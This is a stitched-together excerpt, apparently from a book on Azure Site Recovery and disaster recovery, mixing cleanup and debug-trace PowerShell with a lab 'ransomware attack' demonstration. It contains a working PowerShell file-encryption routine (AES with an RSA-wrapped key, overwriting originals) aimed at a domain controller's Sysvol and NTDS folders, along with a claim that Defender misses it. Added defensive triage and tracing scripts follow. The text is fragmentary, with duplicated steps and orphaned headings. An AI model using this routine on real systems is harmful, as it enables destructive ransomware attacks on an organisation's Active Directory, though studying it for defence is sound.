    $isAdmin = $principal.IsInRole($administrators)
    if (!$isAdmin)
    {
        "Please run the script as an administrator in elevated mode."
        $choice = Read-Host
        return;
    }
    $error.Clear()
    "This script will remove the old Azure Site Recovery Provider related properties. Do you want to continue (Y/N) ?"
    $choice = Read-Host
    # "dra" is the Azure Site Recovery Provider service.
    $serviceName = "dra"
    $service = Get-Service -Name $serviceName
    # $asrHivePath, $registrationPath and $proxySettingsPath are set in a part of the
    # script that is not shown here; they point at the provider's registry hive.
    if (Test-Path $asrHivePath)
    {
        if (Test-Path $registrationPath)
        {
            "Removing registration related registry keys."
            Remove-Item -Recurse -Path $registrationPath
        }
        if (Test-Path $proxySettingsPath)
        {
            "Removing proxy settings"
            Remove-Item -Recurse -Path $proxySettingsPath
        }
Open an elevated PowerShell Window and then run the following commands to create your
trace definition:
Note: The default location specified above is C:\temp. You may safely change this value if
needed. The folder will be created if it does not exist.
Start the trace by typing the following command in the elevated Windows PowerShell window:
logman start ASRDebug
As soon as you reproduce your issue, stop the trace by typing the following command:
logman stop ASRDebug
Collect debug logs from the folder <installation folder>\Temp. The default location will be
C:\Program Files\Microsoft Azure Recovery Services Agent\Temp.
Note: This scenario is based on real-life events that took place 2 years ago. The client
in question had their Admin credentials compromised through an online cloud backup provider.
The attackers gained access to the backups and were able to crack the NTDS.dit (Active
Directory database) offline. They could then come and go at their leisure, and they executed
this sophisticated attack on the customer's busiest day of the year.
To showcase an attack like this, we are going to use PowerShell with Administrative privileges.
You will notice how none of Windows Defender's protection policies catch this.
We will do two things in this attack: First, we will encrypt the Sysvol folder on a single domain
controller. Second, we will take down Active Directory by encrypting the c:\Windows\NTDS
folder on each domain controller.
All of these steps were performed in a lab environment. Please do not try any of these steps in
production.
The code below is only to be used for testing purposes. DO NOT run this in a production
environment. None of the authors of this book take any responsibility for your actions.
Windows Defender will not pick this attack up because it was executed with Administrative
Credentials. This means that, in this case, you are now the victim of a Ransomware Attack.
#global variables
$csv = "C:\windows\temp\drives.csv"
Function Encrypt-File
{
    Param([Parameter(mandatory=$true)][System.IO.FileInfo]$FilesToEncrypt,
          [Parameter(mandatory=$true)][System.Security.Cryptography.X509Certificates.X509Certificate2]$Cert)
    Try { [System.Reflection.Assembly]::LoadWithPartialName("System.Security.Cryptography") }
    Catch { Write-Error "Could not load required assembly."; Return }
    $AesProvider = New-Object System.Security.Cryptography.AesManaged
    $AesProvider.KeySize = 256
    $AesProvider.BlockSize = 128
    $AesProvider.Mode = [System.Security.Cryptography.CipherMode]::CBC
    $KeyFormatter = New-Object System.Security.Cryptography.RSAPKCS1KeyExchangeFormatter($Cert.PublicKey.Key)
    [Byte[]]$KeyEncrypted = $KeyFormatter.CreateKeyExchange($AesProvider.Key, $AesProvider.GetType())
    [Byte[]]$LenKey = $Null
    [Byte[]]$LenIV = $Null
    [Int]$LKey = $KeyEncrypted.Length
    $LenKey = [System.BitConverter]::GetBytes($LKey)
    [Int]$LIV = $AesProvider.IV.Length
    $LenIV = [System.BitConverter]::GetBytes($LIV)
    $FileStreamWriter
    Try { $FileStreamWriter = New-Object System.IO.FileStream("$($env:temp+$FilesToEncrypt.Name)", [System.IO.FileMode]::Create) }
    Catch { Write-Error "Unable to open output file for writing."; Return }
    $FileStreamWriter.Write($LenKey, 0, 4)
    $FileStreamWriter.Write($LenIV, 0, 4)
    $FileStreamWriter.Write($KeyEncrypted, 0, $LKey)
    $FileStreamWriter.Write($AesProvider.IV, 0, $LIV)
    $Transform = $AesProvider.CreateEncryptor()
    $CryptoStream = New-Object System.Security.Cryptography.CryptoStream($FileStreamWriter, $Transform, [System.Security.Cryptography.CryptoStreamMode]::Write)
    [Int]$Count = 0
    [Int]$Offset = 0
    [Int]$BlockSizeBytes = $AesProvider.BlockSize / 8
    [Byte[]]$Data = New-Object Byte[] $BlockSizeBytes
    [Int]$BytesRead = 0
    Try { $FileStreamReader = New-Object System.IO.FileStream("$($FilesToEncrypt.FullName)", [System.IO.FileMode]::Open) }
    Catch { Write-Error "Unable to open input file for reading."; Return }
    Do
    {
        $Count = $FileStreamReader.Read($Data, 0, $BlockSizeBytes)
        $Offset += $Count
        $CryptoStream.Write($Data, 0, $Count)
        $BytesRead += $BlockSizeBytes
    }
    While ($Count -gt 0)
    $CryptoStream.FlushFinalBlock()
    $CryptoStream.Close()
    $FileStreamReader.Close()
    $FileStreamWriter.Close()
    Copy-Item -Path $($env:temp+$FilesToEncrypt.Name) -Destination $FilesToEncrypt.FullName -Force
}
Exit
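From the responder's side, the most useful thing to know about the script above is the on-disk layout it leaves behind: a 4-byte little-endian key length, a 4-byte IV length, the RSA-wrapped AES key, the IV, and then AES-CBC ciphertext. That layout is fingerprintable, which is what lets you separate files this simulation touched from files that are merely corrupt when scoping the damage. The script below is an added triage example, not part of the book's script: it checks a file's header against that layout, walks a folder tree to list matching files, and exercises itself on constructed sample data. The function names and the set of RSA key sizes it accepts are this example's own assumptions.

```powershell
# Added triage example (not from the book). Fingerprints files laid out the way Encrypt-File
# writes them: [Int32 LenKey][Int32 LenIV][wrapped key, LenKey bytes][IV, LenIV bytes][AES-CBC data]
# Function names are this example's own; assumption: the certificate used was a 1024-4096-bit RSA key.
function Test-EncryptFileHeader {
    param([Parameter(Mandatory)][string]$Path)

    $fi = Get-Item -LiteralPath $Path -ErrorAction Stop
    if ($fi.Length -lt 8) { return $false }

    $header = New-Object byte[] 8
    $fs = [System.IO.File]::OpenRead($fi.FullName)
    try     { [void]$fs.Read($header, 0, 8) }
    finally { $fs.Close() }

    # BitConverter::GetBytes wrote these little-endian; ToInt32 reads them the same way.
    $lenKey = [System.BitConverter]::ToInt32($header, 0)
    $lenIV  = [System.BitConverter]::ToInt32($header, 4)

    # RSAPKCS1KeyExchangeFormatter output is exactly the RSA modulus size (128..512 bytes).
    $plausibleKey  = @(128, 256, 384, 512) -contains $lenKey
    $plausibleIV   = ($lenIV -eq 16)                     # AES block size is 128 bits
    $cipherLen     = $fi.Length - 8 - $lenKey - $lenIV
    # AES-CBC with PKCS7 padding always produces a positive multiple of 16 bytes.
    $plausibleBody = ($cipherLen -gt 0) -and ($cipherLen % 16 -eq 0)

    return ($plausibleKey -and $plausibleIV -and $plausibleBody)
}

function Find-EncryptFileVictims {
    param([Parameter(Mandatory)][string]$Root)
    Get-ChildItem -LiteralPath $Root -File -Recurse -Force -ErrorAction SilentlyContinue |
        Where-Object { Test-EncryptFileHeader -Path $_.FullName } |
        Select-Object FullName, Length, LastWriteTime
}

# --- constructed demo data (not real victim files) ---
$demo = Join-Path $env:TEMP ("triage-demo-" + [guid]::NewGuid())
New-Item -ItemType Directory -Path $demo | Out-Null

# 1) an ordinary text file: must NOT match
Set-Content -LiteralPath (Join-Path $demo 'clean.txt') -Value 'hello world'

# 2) a file shaped like Encrypt-File output for a 2048-bit certificate; random bytes stand in
#    for the wrapped key (256 bytes), the IV (16 bytes) and three ciphertext blocks (48 bytes)
$rng = [System.Security.Cryptography.RandomNumberGenerator]::Create()
$key = New-Object byte[] 256; $rng.GetBytes($key)
$iv  = New-Object byte[] 16;  $rng.GetBytes($iv)
$ct  = New-Object byte[] 48;  $rng.GetBytes($ct)
[byte[]]$blob = [System.BitConverter]::GetBytes([int]256) + [System.BitConverter]::GetBytes([int]16) + $key + $iv + $ct
[System.IO.File]::WriteAllBytes((Join-Path $demo 'report.docx'), $blob)

Find-EncryptFileVictims -Root $demo      # expected: report.docx only
Remove-Item -LiteralPath $demo -Recurse -Force
```

Two observations from the script itself are worth folding into the response. First, it stages each encrypted copy under $env:TEMP with Copy-Item and never removes the staging copy, so the Temp folder of the account that ran it is worth collecting as evidence. Second, the check above is a format match, not proof of encryption by this particular script; a file that matches should be treated as suspect and compared against the last known-good recovery point rather than assumed lost.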
1. Logon to DC01 as Administrator.
7. Then grab the files from the folder:
$FilesToEncrypt = Get-ChildItem -recurse -Force -Path $FolderBrowser.SelectedPath | Where-Object { !($_.PSIsContainer -eq $true) } | % {$_.FullName} -ErrorAction SilentlyContinue
1. Logon to DC01 as Administrator.
7. Then grab the files from the folder:
$FilesToEncrypt = Get-ChildItem -recurse -Force -Path $FolderBrowser.SelectedPath | Where-Object { !($_.PSIsContainer -eq $true) } | % {$_.FullName} -ErrorAction SilentlyContinue
As you can see from the screenshot above, our replication is still running to Azure. Azure
Site Recovery doesn't understand that anything bad has happened. Soon enough, all of our DCs
in our Recovery Vault will also have rolling blue screens.
11. We can also enable debug logging to see what is happening:
logman create trace ASRDebug -v mmddhhmm -o C:\temp\asr.etl -cnf 01:00:00 -nb 10 250 -bs 16 -ow -y
logman update ASRDebug -p "Microsoft-Azure Site Recovery-Provider" 0x8000000000000000 0x5
logman update ASRDebug -p "MicrosoftAzureRecoveryServices" 0xC000000000000000 0x5
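The trace definition, the start/stop commands and the log-collection step earlier in the chapter are one procedure, so here they are combined into a pair of functions. This is an added example, not the book's or Microsoft's code: it uses the book's logman commands and default paths as given, and the function names, the collection folder and the elevation check are this example's own.

```powershell
# Added helper (not from the book): one-shot ASR debug trace capture and log collection.
# Run from an elevated PowerShell window; logman refuses to create the collector otherwise.
function Assert-Elevated {
    $id = [System.Security.Principal.WindowsIdentity]::GetCurrent()
    $p  = New-Object System.Security.Principal.WindowsPrincipal($id)
    if (-not $p.IsInRole([System.Security.Principal.WindowsBuiltInRole]::Administrator)) {
        throw "Run this from an elevated PowerShell window."
    }
}

function Start-AsrDebugTrace {
    param([string]$EtlFolder = 'C:\temp')      # same default as the book's logman command
    Assert-Elevated
    if (-not (Test-Path $EtlFolder)) { New-Item -ItemType Directory -Path $EtlFolder | Out-Null }
    $etl = Join-Path $EtlFolder 'asr.etl'
    # Commands exactly as given in the chapter; -v mmddhhmm stamps each file (asr_MMDDhhmm.etl).
    logman create trace ASRDebug -v mmddhhmm -o $etl -cnf 01:00:00 -nb 10 250 -bs 16 -ow -y
    logman update ASRDebug -p "Microsoft-Azure Site Recovery-Provider" 0x8000000000000000 0x5
    logman update ASRDebug -p "MicrosoftAzureRecoveryServices" 0xC000000000000000 0x5
    logman start ASRDebug
    Write-Host "Trace running. Reproduce the issue, then call Stop-AsrDebugTrace."
}

function Stop-AsrDebugTrace {
    param(
        [string]$EtlFolder = 'C:\temp',
        # Agent log folder from the chapter (<installation folder>\Temp, default below).
        [string]$AgentTemp = 'C:\Program Files\Microsoft Azure Recovery Services Agent\Temp',
        # Where to gather everything for the support case (this example's choice).
        [string]$CollectTo = (Join-Path $env:USERPROFILE 'Desktop\ASRDebug')
    )
    Assert-Elevated
    logman stop ASRDebug
    logman delete ASRDebug        # remove the collector set so the next capture starts clean
    New-Item -ItemType Directory -Path $CollectTo -Force | Out-Null
    Copy-Item -Path (Join-Path $EtlFolder 'asr*.etl') -Destination $CollectTo -ErrorAction SilentlyContinue
    if (Test-Path $AgentTemp) {
        Copy-Item -Path (Join-Path $AgentTemp '*') -Destination $CollectTo -Recurse -Force -ErrorAction SilentlyContinue
    }
    Get-ChildItem -LiteralPath $CollectTo -Recurse -File | Select-Object FullName, Length
}

# Usage: Start-AsrDebugTrace; reproduce the failure; Stop-AsrDebugTrace
```

Keeping the start and stop in one place matters for a reason the chapter hints at: a trace left running with -cnf 01:00:00 keeps rolling to a new file every hour, so an orphaned collector quietly fills C:\temp on a host you may already be short of disk on during a recovery.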
Chapter 8 Disaster Recovery items left forgotten
Chapter 8
Chapter 9 Join us at MVPDays and meet great MVP’s like this in person
Chapter 9
Live Presentations
Dave frequently speaks at Microsoft conferences around North America, such as TechEd,
VeeamOn, TechDays, and MVPDays Community Roadshow.
www.checkyourlogs.net
www.mvpdays.com
Video Training
For video-based training, see the following site:
www.mvpdays.com
www.truesec.com
www.checkyourlogs.net
Consulting Services
Dave and Cristal have worked with some of the largest companies in the world and have a wealth
of experience and expertise. Customer engagements are typically between two weeks and six
months.